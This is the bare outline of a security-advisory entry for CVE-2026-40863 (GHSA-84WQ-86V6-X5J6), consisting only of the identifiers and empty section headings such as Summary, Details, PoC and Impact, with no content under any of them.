FKIE_CVE-2026-40863

GHSA-84WQ-86V6-X5J6

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature